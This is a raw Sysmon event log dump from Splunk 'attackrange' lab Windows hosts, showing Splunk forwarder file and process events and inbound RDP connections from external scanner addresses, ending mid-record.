154100x800000000000000073421Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:07.297{A7A01FEF-EBC3-607E-AE0B-00000000BB01}4984C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000050217Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:05.643{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-56555-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050216Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:07.406{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=711A6748F3D5E3A464C95CA34197ACCA,SHA256=819D46FC77CAA6410F630E03820D0D898660C983779FEC16D0C4ADA245690F94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073434Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:08.859{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CC06358F6CB42089183856C9883957A,SHA256=AB7377A7EA53772B168E7DC9BD7E60057702871D4614A9EB6CE52AAB9599EF5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073433Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:08.499{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=4B3F3E95FB930AAC57367269CF15695C,SHA256=5CF669BD7B9D90784F66F57333ACBA1FAD4973BBBE7760849D51D8BE89972618,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073432Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:08.437{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=45324A1F2F73531F4697AF338DBF295F,SHA256=1F20A50A29111EE2CAE791169D57E9F0DC9D58289A83E52A4D1984C3B9EDB68F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050220Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:08.781{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=421638280B88EF89968E860BCE778339,SHA256=2B9DF49A8329456D78850B27F4A8D86D54798F126403A18920BC8C61A661EFF3,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050219Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:06.853{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-49192-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050218Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:08.453{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B14C07C642E379D4D0EE976FB8A3DD6D,SHA256=7761B135BCDE17DA8FAAF1ECCFB264A59C07455B2E5AAAE447FE471A7562C542,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073436Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:09.890{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B0E39211AEAAEDAD38C84CFAAA8B856,SHA256=3C2A6C5A575E7D3D1DEAB0BE26E790A201DDF4945B1D477062A3887427230CB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073435Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:09.499{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=0CFFD5D9ACC53D3C7239B0E8B7BA53BE,SHA256=C5A866C61BE889F5E5E86DC4151E0D0B7CDE2EB13CBC8E2608C9C0CDF927EE66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050224Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:09.969{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4E30AE2011C809863686F0C46CB25117,SHA256=8172DE9075E9F6C23A942022C67A8BE5353559FF9CBE314E52271F1197A6F17F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050223Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:07.998{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com63514-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050222Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:07.238{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-58027-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050221Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:09.469{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19C343B236C30917775EBC7FBA9D02D0,SHA256=3E8EE83FEADD588B1D88C536493B7907B54FC0066A2C5A782C2EAD57AEE11B1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073441Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:10.952{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6941E8F30A9334ADCA7882D29850051D,SHA256=2EE9635FEEFF95673D3ACEA737EEB46D1EBCC6CA8A512CEC83746EDFBA1CE9C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073440Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:10.546{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=6F93D143A5612F01CA1BF2C527EF1821,SHA256=A1AEE378C1677C16B81CA9A345FEC4FFB28819FEF11997C8C045FC3D5DDF2720,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000073439Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:08.832{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-9366-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000073438Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:08.725{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-12094-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000073437Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:10.030{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AC6184A0E8624524093000D1B69F9609,SHA256=F8F82F0BC13680C76872EF50760D23C57B414151A172EFD66CA3521F10B589C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050225Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:10.469{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10D82EF36591FC9DEDC5A2EF6C12B9CF,SHA256=D6DA1E0034C12BD78B1041F1A62B3DDBD184F31FD597313FF3A733AF24AD0368,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073445Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:11.968{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19B2D4A28E76C0C2F494CB17DCA43F68,SHA256=16E06C34331E0A310D58F0F66279161A2E87342A9085F3BDB8D1794002F2A839,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073444Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:11.562{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=2914607A3D854CD1BA84AC06E9431852,SHA256=85B2FE6B6E40BABCB6CA8B61FA0A407ADDDBF0AA473C280041B53A82A4DC5874,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000073443Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:09.093{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com49346-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000073442Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:08.992{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com54178-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000050226Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:11.516{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E547997267511A01C76F6FFC536910A,SHA256=51D61A8ADDA95260BE83C5986F0EBC4A1B93F1777BAE3B1B03C1DD2AB52C2BAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073450Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:12.983{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A0B1C685FA6FAB7FE75CCB806C5CEBC,SHA256=5966F1B27C2D076511921AC8D2177BD65E3BCC784A6D2B8D26AACA302E88504E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073449Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:12.593{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=8B9D5D779B19629B3EA00F3F7A5F498B,SHA256=8F07E2D0B59479190CB206712F2330E00FAB0A03D5D02F7CDB9A251358C50A30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073448Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:12.499{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=144923F49704D93E6C27F5055035D809,SHA256=D474D2FFF2B3E4AB7ECB0DD1C7C7C574F2B2A4D504BD4C8CBAF185BFA3F25D0D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000073447Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:10.263{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-10730-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000073446Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:10.190{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-13458-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000050230Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:10.431{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-60978-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050229Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:09.826{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52520-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000050228Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:12.594{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BDDC8A8EB6B857DEAE80DEE465A6648,SHA256=6F27AC18EB0FE7D626000CF272D0D398000BFF5932D028799B3D0BF522A403B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050227Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:12.219{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=557ABB680B9C376B3A5DF95791F0C2A7,SHA256=3734CFE63FC4E29506400EC812F0C1DCB393622F9EDC8326CE18BE092514D04B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073453Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:13.749{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3DE14BA019CE5672F8CD6AFE43F66512,SHA256=13420C58B73997A3A100F8D5E292D411F863671C8A98131FF30F17A398C9336C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073452Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:13.608{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=DE2248713B630214732AD4B7B8C21966,SHA256=3EB48E3B440006CD04EF723B9FB0CB4A0F91F370B26830964907AE32909154E1,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000073451Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:11.648{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-14822-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000050232Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:13.672{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=976055F9CA2DD733D0F4105444D574E6,SHA256=2237FCA00509E3DA4EAC331E668B258AC6839D8791370A22CA1DB0D994256EDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050231Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:13.266{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C8F503E706A444466D450FE5212355B3,SHA256=54FF711761A1526B2F8A0043A0FB0F0B4CACBBE899F4FE53FC53C157F4AF36D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073458Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:14.687{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=6303D219B6F56460148C266B0DBE3C13,SHA256=8B73FB97DAE95AA37633E556546E5A4EC57BB4495A1D947E6AF28CBD592F8CE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073457Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:14.483{A7A01FEF-DF97-607E-4709-00000000BB01}6584ATTACKRANGE\AdministratorC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\Administrator\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\6584.xml~RFd1a908.TMPMD5=CDC37ABBACDC5A35D39581DFA1E69C56,SHA256=FD0C987C4EA499B0EF3F04D736EF983ED8B5570A1B8575164A63E0D9F0953E2E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000073456Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:12.910{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com58759-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000073455Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:12.161{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57530-false10.0.1.12-8000- 23542300x800000000000000073454Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:13.999{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B7BA51CD0A2B0A40BF7FEEA603BECE1,SHA256=7E2FAD6C6219F68B5F71B9C974D5ED2FA64AD4177050859A2702ABB993B45C3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050236Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:14.953{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=08DD029376BB03CE1AA2E4BD7F85F4F0,SHA256=7303358687EB68E1F1EE631C3F686933E659B0382759203E19C89C3D77F1ED9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050235Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:14.719{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53F032473C544E274819BCEB5682AD98,SHA256=A75F6409721D1F7EEACF513A62AA77C3243EC15B2054D7B9055E82D8B8A2575E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050234Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:12.043{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-62455-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050233Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:11.858{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-59500-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000073462Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:15.749{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D387AF80040D6CF71EDEF7A500EEE0CC,SHA256=56DAC5CEB1EDDC4AE941B189E7A21449158D0075A5020D08F250A248CA390904,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073461Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:15.718{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=ADFB881748EC6EADD5B550CABC3CBAFE,SHA256=CB22D5FFCDAF39D663CE93EEF5DE02B9988E31E7440F2774154B3DA12F3CD18F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000073460Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:13.207{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-16184-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000073459Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:15.187{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=517E82CEEDBCCB7DE37EB16E2ED45FB0,SHA256=46F3C81B37F58B90F3F4048D2E73B13EC5C3D999739E911188F79F52069CDB99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050238Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:15.734{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C8C26A81E6F4023DCD422A8AF760893,SHA256=6B8EFB905C2AB55AD789C41252B4ADEE60984D112C8760EA48F560E9BCC80131,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050237Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:13.669{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com57510-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000073464Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:16.733{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=0F9C6C67B1E279DF564AA7BCF7603C0A,SHA256=34EBAA38E2C9059B167331E673F2FD6AAE099787D369195209DABD3CE18BDDEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073463Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:16.233{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51273E714F5847358CC0037E5CBC31B2,SHA256=0A99DEE545F992ED5454A3B9FEB029B97B426DAD6ADEED95345C17CD143C681C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050240Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:16.797{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 